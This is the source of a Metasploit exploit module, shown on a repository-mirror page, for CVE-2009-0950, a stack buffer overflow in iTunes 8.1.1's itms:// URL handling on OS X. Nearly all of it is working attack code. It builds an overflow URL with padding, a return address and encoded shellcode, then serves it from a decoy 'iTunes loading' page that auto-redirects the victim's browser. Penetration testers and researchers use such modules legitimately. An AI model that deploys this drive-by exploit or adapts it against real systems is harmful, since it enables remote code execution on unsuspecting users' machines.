Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/itms_overflow.rb
32071 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  # no popup required to visit itms:// URLs in Safari, so throw it in BAP

12
  # include Msf::Exploit::Remote::BrowserAutopwn

13
  # autopwn_info({

14
  #  :ua_name    => HttpClients::SAFARI,

15
  #  :ua_maxver  => "4.1",

16
  #  :ua_minver  => "4.0.5",

17
  #  :javascript => false,

18
  #  :rank       => NormalRanking,

19
  #  :os_name => OperatingSystems::MAC_OSX

20
  # })

21


22
  def initialize(info = {})

23
    super(

24
      update_info(

25
        info,

26
        'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',

27
        'Description' => %q{

28
          This modules exploits a stack-based buffer overflow in iTunes

29
          itms:// URL parsing.  It is accessible from the browser and

30
          in Safari, itms urls will be opened in iTunes automatically.

31
          Because iTunes is multithreaded, only vfork-based payloads should

32
          be used.

33
        },

34
        'Author' => [ 'Will Drewry <redpig[at]dataspill.org>' ],

35
        'License' => MSF_LICENSE,

36
        'References' => [

37
          [ 'CVE', '2009-0950' ],

38
          [ 'OSVDB', '54833' ],

39
          [ 'URL', 'http://support.apple.com/kb/HT3592' ],

40
          [ 'URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html' ]

41
        ],

42
        'Payload' => {

43
          'Space' => 1024, # rough estimate of what browsers will pass.

44
          'DisableNops' => true, # don't pad out the space.

45
          'BadChars' => '',

46
          # The encoder must be URL-safe otherwise it will be automatically

47
          # URL encoded.

48
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,

49
          'EncoderOptions' =>

50
                        {

51
                          'BufferRegister' => 'ECX', # See the comments below

52
                          'BufferOffset' => 3 # See the comments below

53
                        }

54
        },

55
        'Targets' => [

56
          [

57
            'OS X',

58
            {

59
              'Platform' => [ 'osx' ],

60
              'Arch' => ARCH_X86,

61
              'Addr' => 'ATe'

62
            },

63
          ]

64
        ],

65
        'DisclosureDate' => '2009-06-01',

66
        'DefaultTarget' => 0,

67
        'Notes' => {

68
          'Reliability' => UNKNOWN_RELIABILITY,

69
          'Stability' => UNKNOWN_STABILITY,

70
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

71
        }

72
      )

73
    )

74
  end

75


76
  # Generate distribution script, which calls our payload using JavaScript.

77
  def generate_itms_page(p)

78
    # Set the base itms url.

79
    # itms:// or itmss:// can be used.  The trailing colon is used

80
    # to start the attack.  All data after the colon is copied to the

81
    # stack buffer.

82
    itms_base_url = 'itms://:'

83
    itms_base_url << rand_text_alpha(268)  # Fill up the real buffer

84
    itms_base_url << rand_text_alpha(16)   # $ebx, $esi, $edi, $ebp

85
    itms_base_url << target['Addr'] # hullo there, jmp *%ecx!

86
    # The first '/' in the buffer will terminate the copy to the stack buffer.

87
    # In addition, $ecx will be left pointing to the last 6 bytes of the heap

88
    # buffer containing the full URL.  However, if a colon and a ? occur after

89
    # the value in ecx will point to that point in the heap buffer.  In our

90
    # case, it will point to the beginning.  The ! is there to make the

91
    # alphanumeric shellcode execute easily.  (This is why we need an offset

92
    # of 3 in the payload).

93
    itms_base_url << '/:!?' # Truncate the stack buffer overflow and prep for payload

94
    itms_base_url << p # Wooooooo! Payload time.

95
    # We drop on a few extra bytes as the last few bytes can sometimes be

96
    # corrupted.

97
    itms_base_url << rand_text_alpha(4)

98


99
    # Use the pattern creator to simplify exploit creation :)

100
    # itms_base_url << Rex::Text.pattern_create(1024,

101
    #                                           Rex::Text::DefaultPatternSets)

102


103
    # Return back an example URL.  Using an iframe doesn't work with all

104
    # browsers, but that's easy enough to fix if you need to.

105
    return String(<<~EOS)

106
      <html>

107
      <head>

108
      <title>iTunes loading . . .</title>

109
      <meta http-equiv="refresh" content="0; url='#{itms_base_url}'">

110
      </head>

111
      <body>

112
      <p>iTunes should open automatically, but if it doesn't, click to

113
      <a href="#{itms_base_url}">continue</a>.</p>

114
      </body>

115
      </html>

116
    EOS

117
  end

118


119
  def on_request_uri(cli, _request)

120
    print_status('Generating payload...')

121
    return unless (regenerate_payload(cli))

122


123
    # print_status("=> #{payload.encoded}")

124
    print_status("=> #{payload.encoded.length} bytes")

125


126
    print_status('Generating HTML container...')

127
    page = generate_itms_page(payload.encoded)

128
    # print_status("=> #{page}")

129
    print_status('Sending itms page')

130


131
    header = { 'Content-Type' => 'text/html' }

132
    send_response_html(cli, page, header)

133
    handler(cli)

134
  end

135
end

136


137